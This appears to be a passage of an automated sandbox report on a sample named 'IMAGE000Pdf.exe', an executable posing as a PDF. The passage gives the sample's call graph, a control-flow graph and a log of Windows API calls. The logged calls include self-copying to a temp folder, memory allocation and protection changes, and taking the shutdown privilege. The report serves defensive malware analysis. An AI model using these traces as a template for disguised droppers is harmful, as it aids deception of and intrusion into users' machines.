2463->2455 2463->2456 2463->2457 2463->2458 2463->2459 2463->2460 2463->2461 2463->2462 2623 406335 wsprintfW 2463->2623 2624 4063ee lstrcpynW 2463->2624 2464->2463 2466 4061d5 2465->2466 2467 4061c8 2465->2467 2466->2327 2626 40603a 2467->2626 2470 405a16 2469->2470 2471 405a0a CloseHandle 2469->2471 2470->2327 2471->2470 2472->2274 2660 4063ee lstrcpynW 2473->2660 2475 405ddc 2661 405d6e CharNextW CharNextW 2475->2661 2478 4037e3 2478->2325 2487 4063ee lstrcpynW 2478->2487 2479 40669d 5 API calls 2485 405df2 2479->2485 2480 405e23 lstrlenW 2481 405e2e 2480->2481 2480->2485 2482 405cc3 3 API calls 2481->2482 2484 405e33 GetFileAttributesW 2482->2484 2484->2478 2485->2478 2485->2480 2486 405d0f 2 API calls 2485->2486 2667 40674c FindFirstFileW 2485->2667 2486->2480 2487->2304 2488->2312 2490 4039fb 2489->2490 2491 4039ed CloseHandle 2489->2491 2670 403a28 2490->2670 2491->2490 2497 405a69 2496->2497 2498 403835 ExitProcess 2497->2498 2499 405a7d MessageBoxIndirectW 2497->2499 2499->2498 2501 4059b2 2500->2501 2502 4059b6 GetLastError 2500->2502 2501->2314 2502->2501 2503->2315 2505 401389 2 API calls 2504->2505 2506 401420 2505->2506 2506->2284 2514 4066aa 2507->2514 2508 406720 2509 406725 CharPrevW 2508->2509 2512 406746 2508->2512 2509->2508 2510 406713 CharNextW 2510->2508 2510->2514 2511 405cf0 CharNextW 2511->2514 2512->2348 2513 4066ff CharNextW 2513->2514 2514->2508 2514->2510 2514->2511 2514->2513 2515 40670e CharNextW 2514->2515 2515->2510 2517 40348f 2516->2517 2518 405cdf lstrcatW 2516->2518 2517->2351 2518->2517 2520 405f20 GetTickCount GetTempFileNameW 2519->2520 2521 4034a0 2520->2521 2522 405f56 2520->2522 2521->2262 2522->2520 2522->2521 2523->2357 2524->2359 2526 405d1d 2525->2526 2527 405d23 CharPrevW 2526->2527 2528 403081 2526->2528 2527->2526 2527->2528 2529 4063ee lstrcpynW 2528->2529 2529->2363 2531 402fd2 2530->2531 2532 402fba 2530->2532 2535 402fe2 GetTickCount 2531->2535 2536 402fda 2531->2536 2533 402fc3 DestroyWindow 2532->2533 2534 402fca 2532->2534 2533->2534 2534->2366 2537 402ff0 CreateDialogParamW ShowWindow 2535->2537 2538 403013 2535->2538 2566 40681f 2536->2566 2537->2538 2538->2366 2541->2372 2544 403265 2542->2544 2543 403293 2546 403444 ReadFile 2543->2546 2544->2543 2583 40345a SetFilePointer 2544->2583 2547 40329e 2546->2547 2548 4032b0 GetTickCount 2547->2548 2549 4033dd 2547->2549 2550 4033c7 2547->2550 2548->2550 2558 4032dc 2548->2558 2551 40341f 2549->2551 2554 4033e1 2549->2554 2550->2381 2553 403444 ReadFile 2551->2553 2552 403444 ReadFile 2552->2558 2553->2550 2554->2550 2555 403444 ReadFile 2554->2555 2556 405f96 WriteFile 2554->2556 2555->2554 2556->2554 2557 403332 GetTickCount 2557->2558 2558->2550 2558->2552 2558->2557 2559 403357 MulDiv wsprintfW 2558->2559 2581 405f96 WriteFile 2558->2581 2570 405456 2559->2570 2584 405f67 ReadFile 2562->2584 2565->2374 2567 40683c PeekMessageW 2566->2567 2568 406832 DispatchMessageW 2567->2568 2569 402fe0 2567->2569 2568->2567 2569->2366 2571 405471 2570->2571 2579 405513 2570->2579 2572 40548d lstrlenW 2571->2572 2573 40642b 17 API calls 2571->2573 2574 4054b6 2572->2574 2575 40549b lstrlenW 2572->2575 2573->2572 2577 4054c9 2574->2577 2578 4054bc SetWindowTextW 2574->2578 2576 4054ad lstrcatW 2575->2576 2575->2579 2576->2574 2577->2579 2580 4054cf SendMessageW SendMessageW SendMessageW 2577->2580 2578->2577 2579->2558 2580->2579 2582 405fb4 2581->2582 2582->2558 2583->2543 2585 403457 2584->2585 2585->2364 2587 403da7 2586->2587 2608 406335 wsprintfW 2587->2608 2589 403e18 2609 403e4c 2589->2609 2591 403b48 2591->2396 2592 403e1d 2592->2591 2593 40642b 17 API calls 2592->2593 2593->2592 2594->2392 2612 40625b 2595->2612 2598 4062f0 RegQueryValueExW RegCloseKey 2599 403b19 2598->2599 2599->2391 2599->2393 2600->2397 2616 404390 2601->2616 2603 405573 2604 404390 SendMessageW 2603->2604 2605 405585 OleUninitialize 2604->2605 2605->2427 2606 40554c 2606->2603 2619 401389 2606->2619 2608->2589 2610 40642b 17 API calls 2609->2610 2611 403e5a SetWindowTextW 2610->2611 2611->2592 2613 40626a 2612->2613 2614 406273 RegOpenKeyExW 2613->2614 2615 40626e 2613->2615 2614->2615 2615->2598 2615->2599 2617 4043a8 2616->2617 2618 404399 SendMessageW 2616->2618 2617->2606 2618->2617 2621 401390 2619->2621 2620 4013fe 2620->2606 2621->2620 2622 4013cb MulDiv SendMessageW 2621->2622 2622->2621 2623->2463 2624->2463 2625->2450 2627 406090 GetShortPathNameW 2626->2627 2628 40606a 2626->2628 2629 4060a5 2627->2629 2630 4061af 2627->2630 2653 405ee4 GetFileAttributesW CreateFileW 2628->2653 2629->2630 2633 4060ad wsprintfA 2629->2633 2630->2466 2632 406074 CloseHandle GetShortPathNameW 2632->2630 2634 406088 2632->2634 2635 40642b 17 API calls 2633->2635 2634->2627 2634->2630 2636 4060d5 2635->2636 2654 405ee4 GetFileAttributesW CreateFileW 2636->2654 2638 4060e2 2638->2630 2639 4060f1 GetFileSize GlobalAlloc 2638->2639 2640 406113 2639->2640 2641 4061a8 CloseHandle 2639->2641 2642 405f67 ReadFile 2640->2642 2641->2630 2643 40611b 2642->2643 2643->2641 2655 405e49 lstrlenA 2643->2655 2646 406132 lstrcpyA 2649 406154 2646->2649 2647 406146 2648 405e49 4 API calls 2647->2648 2648->2649 2650 40618b SetFilePointer 2649->2650 2651 405f96 WriteFile 2650->2651 2652 4061a1 GlobalFree 2651->2652 2652->2641 2653->2632 2654->2638 2656 405e8a lstrlenA 2655->2656 2657 405e92 2656->2657 2658 405e63 lstrcmpiA 2656->2658 2657->2646 2657->2647 2658->2657 2659 405e81 CharNextA 2658->2659 2659->2656 2660->2475 2662 405d8b 2661->2662 2666 405d9d 2661->2666 2664 405d98 CharNextW 2662->2664 2662->2666 2663 405dc1 2663->2478 2663->2479 2664->2663 2665 405cf0 CharNextW 2665->2666 2666->2663 2666->2665 2668 406762 FindClose 2667->2668 2669 40676d 2667->2669 2668->2669 2669->2485 2671 403a36 2670->2671 2672 403a00 2671->2672 2673 403a3b FreeLibrary GlobalFree 2671->2673 2674 405b00 2672->2674 2673->2672 2673->2673 2675 405dcb 18 API calls 2674->2675 2676 405b20 2675->2676 2677 405b28 DeleteFileW 2676->2677 2678 405b3f 2676->2678 2679 403816 OleUninitialize 2677->2679 2682 405c5f 2678->2682 2713 4063ee lstrcpynW 2678->2713 2679->2281 2679->2282 2681 405b65 2683 405b78 2681->2683 2684 405b6b lstrcatW 2681->2684 2682->2679 2686 40674c 2 API calls 2682->2686 2685 405d0f 2 API calls 2683->2685 2687 405b7e 2684->2687 2685->2687 2689 405c84 2686->2689 2688 405b8e lstrcatW 2687->2688 2690 405b99 lstrlenW FindFirstFileW 2687->2690 2688->2690 2689->2679 2691 405c88 2689->2691 2690->2682 2701 405bbb 2690->2701 2692 405cc3 3 API calls 2691->2692 2693 405c8e 2692->2693 2695 405ab8 5 API calls 2693->2695 2694 405c42 FindNextFileW 2698 405c58 FindClose 2694->2698 2694->2701 2697 405c9a 2695->2697 2699 405cb4 2697->2699 2700 405c9e 2697->2700 2698->2682 2703 405456 24 API calls 2699->2703 2700->2679 2704 405456 24 API calls 2700->2704 2701->2694 2705 405b00 60 API calls 2701->2705 2707 405c0c 2701->2707 2714 4063ee lstrcpynW 2701->2714 2703->2679 2706 405cab 2704->2706 2705->2707 2709 4061b4 36 API calls 2706->2709 2707->2694 2708 405456 24 API calls 2707->2708 2711 405456 24 API calls 2707->2711 2712 4061b4 36 API calls 2707->2712 2715 405ab8 2707->2715 2708->2694 2710 405cb2 2709->2710 2710->2679 2711->2707 2712->2707 2713->2681 2714->2701 2723 405ebf GetFileAttributesW 2715->2723 2718 405ad3 RemoveDirectoryW 2720 405ae1 2718->2720 2719 405adb DeleteFileW 2719->2720 2721 405ae5 2720->2721 2722 405af1 SetFileAttributesW 2720->2722 2721->2707 2722->2721 2724 405ed1 SetFileAttributesW 2723->2724 2725 405ac4 2723->2725 2724->2725 2725->2718 2725->2719 2725->2721 2992 70021000 2995 7002101b 2992->2995 3002 70021516 2995->3002 2997 70021020 2998 70021027 GlobalAlloc 2997->2998 2999 70021024 2997->2999 2998->2999 3000 7002153d 3 API calls 2999->3000 3001 70021019 3000->3001 3004 7002151c 3002->3004 3003 70021522 3003->2997 3004->3003 3005 7002152e GlobalFree 3004->3005 3005->2997 3006 700210e1 3010 70021111 3006->3010 3007 700211d8 GlobalFree 3008 700212ba 2 API calls 3008->3010 3009 700211d3 3009->3007 3010->3007 3010->3008 3010->3009 3011 70021164 GlobalAlloc 3010->3011 3012 700211f8 GlobalFree 3010->3012 3013 70021272 2 API calls 3010->3013 3014 700211c4 GlobalFree 3010->3014 3015 700212e1 lstrcpyW 3010->3015 3011->3010 3012->3010 3013->3014 3014->3010 3015->3010 2891 403e6b 2892 403e83 2891->2892 2893 403fbe 2891->2893 2892->2893 2894 403e8f 2892->2894 2895 40400f 2893->2895 2896 403fcf GetDlgItem GetDlgItem 2893->2896 2898 403e9a SetWindowPos 2894->2898 2899 403ead 2894->2899 2897 404069 2895->2897 2908 401389 2 API calls 2895->2908 2900 404344 18 API calls 2896->2900 2901 404390 SendMessageW 2897->2901 2923 403fb9 2897->2923 2898->2899 2902 403eb2 ShowWindow 2899->2902 2903 403eca 2899->2903 2904 403ff9 SetClassLongW 2900->2904 2917 40407b 2901->2917 2902->2903 2905 403ed2 DestroyWindow 2903->2905 2906 403eec 2903->2906 2907 40140b 2 API calls 2904->2907 2961 4042cd 2905->2961 2909 403ef1 SetWindowLongW 2906->2909 2910 403f02 2906->2910 2907->2895 2911 404041 2908->2911 2909->2923 2912 403fab 2910->2912 2913 403f0e GetDlgItem 2910->2913 2911->2897 2914 404045 SendMessageW 2911->2914 2971 4043ab 2912->2971 2918 403f21 SendMessageW IsWindowEnabled 2913->2918 2919 403f3e 2913->2919 2914->2923 2915 40140b 2 API calls 2915->2917 2916 4042cf DestroyWindow EndDialog 2916->2961 2917->2915 2917->2916 2922 40642b 17 API calls 2917->2922 2917->2923 2931 404344 18 API calls 2917->2931 2952 40420f DestroyWindow 2917->2952 2962 404344 2917->2962 2918->2919 2918->2923 2924 403f4b 2919->2924 2926 403f92 SendMessageW 2919->2926 2927 403f5e 2919->2927 2935 403f43 2919->2935 2921 4042fe ShowWindow 2921->2923 2922->2917 2924->2926 2924->2935 2926->2912 2929 403f66 2927->2929 2930 403f7b 2927->2930 2928 403f79 2928->2912 2933 40140b 2 API calls 2929->2933 2932 40140b 2 API calls 2930->2932 2931->2917 2934 403f82 2932->2934 2933->2935 2934->2912 2934->2935 2968 40431d 2935->2968 2937 4040f6 GetDlgItem 2938 404113 ShowWindow KiUserCallbackDispatcher 2937->2938 2939 40410b 2937->2939 2965 404366 KiUserCallbackDispatcher 2938->2965 2939->2938 2941 40413d EnableWindow 2946 404151 2941->2946 2942 404156 GetSystemMenu EnableMenuItem SendMessageW 2943 404186 SendMessageW 2942->2943 2942->2946 2943->2946 2945 403e4c 18 API calls 2945->2946 2946->2942 2946->2945 2966 404379 SendMessageW 2946->2966 2967 4063ee lstrcpynW 2946->2967 2948 4041b5 lstrlenW 2949 40642b 17 API calls 2948->2949 2950 4041cb SetWindowTextW 2949->2950 2951 401389 2 API calls 2950->2951 2951->2917 2953 404229 CreateDialogParamW 2952->2953 2952->2961 2954 40425c 2953->2954 2953->2961 2955 404344 18 API calls 2954->2955 2956 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2955->2956 2957 401389 2 API calls 2956->2957 2958 4042ad 2957->2958 2958->2923 2959 4042b5 ShowWindow 2958->2959 2960 404390 SendMessageW 2959->2960 2960->2961 2961->2921 2961->2923 2963 40642b 17 API calls 2962->2963 2964 40434f SetDlgItemTextW 2963->2964 2964->2937 2965->2941 2966->2946 2967->2948 2969 404324 2968->2969 2970 40432a SendMessageW 2968->2970 2969->2970 2970->2928 2972 4043c3 GetWindowLongW 2971->2972 2973 40446e 2971->2973 2972->2973 2974 4043d8 2972->2974 2973->2923 2974->2973 2975 404405 GetSysColor 2974->2975 2976 404408 2974->2976 2975->2976 2977 404418 SetBkMode 2976->2977 2978 40440e SetTextColor 2976->2978 2979 404430 GetSysColor 2977->2979 2980 404436 2977->2980 2978->2977 2979->2980 2981 404447 2980->2981 2982 40443d SetBkColor 2980->2982 2981->2973 2983 404461 CreateBrushIndirect 2981->2983 2984 40445a DeleteObject 2981->2984 2982->2981 2983->2973 2984->2983 3053 70022349 3054 700223b3 3053->3054 3055 700223dd 3054->3055 3056 700223be GlobalAlloc 3054->3056 3056->3054 3057 402f2b 3058 402f3d SetTimer 3057->3058 3060 402f56 3057->3060 3058->3060 3059 402fab 3060->3059 3061 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3060->3061 3061->3059 3068 7002166d 3069 70021516 GlobalFree 3068->3069 3071 70021685 3069->3071 3070 700216cb GlobalFree 3071->3070 3072 700216a0 3071->3072 3073 700216b7 VirtualFree 3071->3073 3072->3070 3073->3070 2726 70021777 2727 700217aa 2726->2727 2768 70021b5f 2727->2768 2729 700217b1 2730 700218d6 2729->2730 2731 700217c2 2729->2731 2732 700217c9 2729->2732 2818 7002239e 2731->2818 2802 700223e0 2732->2802 2737 700217ee 2738 7002180f 2737->2738 2739 7002182d 2737->2739 2831 700225b5 2738->2831 2742 70021833 2739->2742 2743 7002187e 2739->2743 2740 700217f8 2740->2737 2828 70022d83 2740->2828 2741 700217df 2745 700217e5 2741->2745 2751 700217f0 2741->2751 2850 700215c6 2742->2850 2749 700225b5 10 API calls 2743->2749 2745->2737 2812 70022af8 2745->2812 2754 7002186f 2749->2754 2750 70021815 2842 700215b4 2750->2842 2822 70022770 2751->2822 2760 700218c5 2754->2760 2856 70022578 2754->2856 2757 700217f6 2757->2737 2758 700225b5 10 API calls 2758->2754 2760->2730 2762 700218cf GlobalFree 2760->2762 2762->2730 2765 700218b1 2765->2760 2860 7002153d wsprintfW 2765->2860 2766 700218aa FreeLibrary 2766->2765 2863 7002121b GlobalAlloc 2768->2863 2770 70021b86 2864 7002121b GlobalAlloc 2770->2864 2772 70021dcb GlobalFree GlobalFree GlobalFree 2773 70021de8 2772->2773 2784 70021e32 2772->2784 2775 700221de 2773->2775 2781 70021dfd 2773->2781 2773->2784 2774 70021c86 GlobalAlloc 2792 70021b91 2774->2792 2776 70022200 GetModuleHandleW 2775->2776 2775->2784 2777 70022211 LoadLibraryW 2776->2777 2778 70022226 2776->2778 2777->2778 2777->2784 2871 7002161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2778->2871 2779 70021cd1 lstrcpyW 2783 70021cdb lstrcpyW 2779->2783 2780 70021cef GlobalFree 2780->2792 2781->2784 2867 7002122c 2781->2867 2783->2792 2784->2729 2785 70022278 2785->2784 2789 70022285 lstrlenW 2785->2789 2786 70022086 2870 7002121b GlobalAlloc 2786->2870 2872 7002161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2789->2872 2790 70022238 2790->2785 2800 70022262 GetProcAddress 2790->2800 2792->2772 2792->2774 2792->2779 2792->2780 2792->2783 2792->2784 2792->2786 2793 70021fc7 GlobalFree 2792->2793 2794 7002210e 2792->2794 2795 70021d2d 2792->2795 2797 7002122c 2 API calls 2792->2797 2793->2792 2794->2784 2799 70022176 lstrcpyW 2794->2799 2795->2792 2865 7002158f GlobalSize GlobalAlloc 2795->2865 2796 7002229f 2796->2784 2797->2792 2799->2784 2800->2785 2801 7002208f 2801->2729 2803 700223f8 2802->2803 2805 70022521 GlobalFree 2803->2805 2807 700224a0 GlobalAlloc WideCharToMultiByte 2803->2807 2808 700224cb GlobalAlloc CLSIDFromString 2803->2808 2809 7002122c GlobalAlloc lstrcpynW 2803->2809 2811 700224ea 2803->2811 2874 700212ba 2803->2874 2805->2803 2806 700217cf 2805->2806 2806->2737 2806->2740 2806->2741 2807->2805 2808->2805 2809->2803 2811->2805 2878 70022704 2811->2878 2814 70022b0a 2812->2814 2813 70022baf VirtualAlloc 2817 70022bcd 2813->2817 2814->2813 2816 70022c99 2816->2737 2881 70022aa2 2817->2881 2819 700223b3 2818->2819 2820 700217c8 2819->2820 2821 700223be GlobalAlloc 2819->2821 2820->2732 2821->2819 2826 700227a0 2822->2826 2823 7002283b GlobalAlloc 2827 7002285e 2823->2827 2824 7002284e 2825 70022854 GlobalSize 2824->2825 2824->2827 2825->2827 2826->2823 2826->2824 2827->2757 2830 70022d8e 2828->2830 2829 70022dce GlobalFree 2830->2829 2885 7002121b GlobalAlloc 2831->2885 2833 7002265a StringFromGUID2 2839 700225bf 2833->2839 2834 7002266b lstrcpynW 2834->2839 2835 70022638 MultiByteToWideChar 2835->2839 2836 7002267e wsprintfW 2836->2839 2837 700226a2 GlobalFree 2837->2839 2838 700226d7 GlobalFree 2838->2750 2839->2833 2839->2834 2839->2835 2839->2836 2839->2837 2839->2838 2840 70021272 2 API calls 2839->2840 2886 700212e1 2839->2886 2840->2839 2890 7002121b GlobalAlloc 2842->2890 2844 700215b9 2845 700215c6 2 API calls 2844->2845 2846 700215c3 2845->2846 2847 70021272 2846->2847 2848 700212b5 GlobalFree 2847->2848 2849 7002127b GlobalAlloc lstrcpynW 2847->2849 2848->2754 2849->2848 2851 700215d2 wsprintfW 2850->2851 2852 700215ff lstrcpyW 2850->2852 2855 70021618 2851->2855 2852->2855 2855->2758 2857 70022586 2856->2857 2858 70021891 2856->2858 2857->2858 2859 700225a2 GlobalFree 2857->2859 2858->2765 2858->2766 2859->2857 2861 70021272 2 API calls 2860->2861 2862 7002155e 2861->2862 2862->2760 2863->2770 2864->2792 2866 700215ad 2865->2866 2866->2795 2873 7002121b GlobalAlloc 2867->2873 2869 7002123b lstrcpynW 2869->2784 2870->2801 2871->2790 2872->2796 2873->2869 2875 700212c1 2874->2875 2876 7002122c 2 API calls 2875->2876 2877 700212df 2876->2877 2877->2803 2879 70022712 VirtualAlloc 2878->2879 2880 70022768 2878->2880 2879->2880 2880->2811 2882 70022aad 2881->2882 2883 70022ab2 GetLastError 2882->2883 2884 70022abd 2882->2884 2883->2884 2884->2816 2885->2839 2887 700212ea 2886->2887 2888 7002130c 2886->2888 2887->2888 2889 700212f0 lstrcpyW 2887->2889 2888->2839 2889->2888 2890->2844 3016 700216d4 3017 70021703 3016->3017 3018 70021b5f 22 API calls 3017->3018 3019 7002170a 3018->3019 3020 70021711 3019->3020 3021 7002171d 3019->3021 3022 70021272 2 API calls 3020->3022 3023 70021727 3021->3023 3024 70021744 3021->3024 3031 7002171b 3022->3031 3025 7002153d 3 API calls 3023->3025 3026 7002174a 3024->3026 3027 7002176e 3024->3027 3029 7002172c 3025->3029 3030 700215b4 3 API calls 3026->3030 3028 7002153d 3 API calls 3027->3028 3028->3031 3032 700215b4 3 API calls 3029->3032 3033 7002174f 3030->3033 3034 70021732 3032->3034 3035 70021272 2 API calls 3033->3035 3037 70021272 2 API calls 3034->3037 3036 70021755 GlobalFree 3035->3036 3036->3031 3038 70021769 GlobalFree 3036->3038 3039 70021738 GlobalFree 3037->3039 3038->3031 3039->3031 3040 70021058 3042 70021074 3040->3042 3041 700210dd 3042->3041 3043 70021516 GlobalFree 3042->3043 3044 70021092 3042->3044 3043->3044 3045 70021516 GlobalFree 3044->3045 3046 700210a2 3045->3046 3047 700210b2 3046->3047 3048 700210a9 GlobalSize 3046->3048 3049 700210b6 GlobalAlloc 3047->3049 3050 700210c7 3047->3050 3048->3047 3051 7002153d 3 API calls 3049->3051 3052 700210d2 GlobalFree 3050->3052 3051->3050 3052->3041 3062 700218d9 3063 700218fc 3062->3063 3064 70021943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 3063->3064 3065 70021931 GlobalFree 3063->3065 3066 70021272 2 API calls 3064->3066 3065->3064 3067 70021ace GlobalFree GlobalFree 3066->3067 2985 700229df 2986 70022a2f 2985->2986 2987 700229ef VirtualProtect 2985->2987 2987->2986 3074 7002103d 3075 7002101b 5 API calls 3074->3075 3076 70021056 3075->3076

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4034a2-4034df SetErrorMode GetVersion 1 4034e1-4034e9 call 4067e3 0->1 2 4034f2 0->2 1->2 7 4034eb 1->7 4 4034f7-40350b call 406773 lstrlenA 2->4 9 40350d-403529 call 4067e3 * 3 4->9 7->2 16 40353a-403599 #17 OleInitialize SHGetFileInfoW call 4063ee GetCommandLineW call 4063ee 9->16 17 40352b-403531 9->17 24 4035a3-4035bd call 405cf0 CharNextW 16->24 25 40359b-4035a2 16->25 17->16 21 403533 17->21 21->16 28 4035c3-4035c9 24->28 29 4036d4-4036ee GetTempPathW call 403471 24->29 25->24 30 4035d2-4035d6 28->30 31 4035cb-4035d0 28->31 38 4036f0-40370e GetWindowsDirectoryW lstrcatW call 403471 29->38 39 403746-403760 DeleteFileW call 403015 29->39 33 4035d8-4035dc 30->33 34 4035dd-4035e1 30->34 31->30 31->31 33->34 36 4036a0-4036ad call 405cf0 34->36 37 4035e7-4035ed 34->37 54 4036b1-4036b7 36->54 55 4036af-4036b0 36->55 42 403608-403641 37->42 43 4035ef-4035f7 37->43 38->39 52 403710-403740 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403471 38->52 56 403811-403821 call 4039e3 OleUninitialize 39->56 57 403766-40376c 39->57 50 403643-403648 42->50 51 40365e-403698 42->51 48 4035f9-4035fc 43->48 49 4035fe 43->49 48->42 48->49 49->42 50->51 58 40364a-403652 50->58 51->36 53 40369a-40369e 51->53 52->39 52->56 53->36 60 4036bf-4036cd call 4063ee 53->60 54->28 61 4036bd 54->61 55->54 75 403947-40394d 56->75 76 403827-403837 call 405a54 ExitProcess 56->76 62 403801-403808 call 403abd 57->62 63 403772-40377d call 405cf0 57->63 65 403654-403657 58->65 66 403659 58->66 68 4036d2 60->68 61->68 74 40380d 62->74 80 4037cb-4037d5 63->80 81 40377f-4037b4 63->81 65->51 65->66 66->51 68->29 74->56 78 4039cb-4039d3 75->78 79 40394f-403965 GetCurrentProcess OpenProcessToken 75->79 82 4039d5 78->82 83 4039d9-4039dd ExitProcess 78->83 87 403967-403995 LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 40399b-4039a9 call 4067e3 79->88 85 4037d7-4037e5 call 405dcb 80->85 86 40383d-403851 call 4059bf lstrcatW 80->86 89 4037b6-4037ba 81->89 82->83 85->56 99 4037e7-4037fd call 4063ee * 2 85->99 100 403853-403859 lstrcatW 86->100 101 40385e-403878 lstrcatW lstrcmpiW 86->101 87->88 102 4039b7-4039c2 ExitWindowsEx 88->102 103 4039ab-4039b5 88->103 93 4037c3-4037c7 89->93 94 4037bc-4037c1 89->94 93->89 98 4037c9 93->98 94->93 94->98 98->80 99->62 100->101 101->56 105 40387a-40387d 101->105 102->78 106 4039c4-4039c6 call 40140b 102->106 103->102 103->106 108 403886 call 4059a2 105->108 109 40387f call 405925 105->109 106->78 117 40388b-403899 SetCurrentDirectoryW 108->117 116 403884 109->116 116->117 118 4038a6-4038cf call 4063ee 117->118 119 40389b-4038a1 call 4063ee 117->119 123 4038d4-4038f0 call 40642b DeleteFileW 118->123 119->118 126 403931-403939 123->126 127 4038f2-403902 CopyFileW 123->127 126->123 128 40393b-403942 call 4061b4 126->128 127->126 129 403904-40391d call 4061b4 call 40642b call 4059d7 127->129 128->56 137 403922-403924 129->137 137->126 138 403926-40392d CloseHandle 137->138 138->126
                                      APIs
                                      • SetErrorMode.KERNELBASE ref: 004034C5
                                      • GetVersion.KERNEL32 ref: 004034CB
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                      • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                      • OleInitialize.OLE32(00000000), ref: 00403542
                                      • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                      • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000020,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                        • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                        • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
                                      • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                        • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                      • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
                                      • ExitProcess.KERNEL32 ref: 00403837
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                      • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\IMAGE000Pdf.exe,0079F708,00000001,?,00000007,00000009,0000000B), ref: 004038FA
                                      • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                      • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                      • ExitProcess.KERNEL32 ref: 004039DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
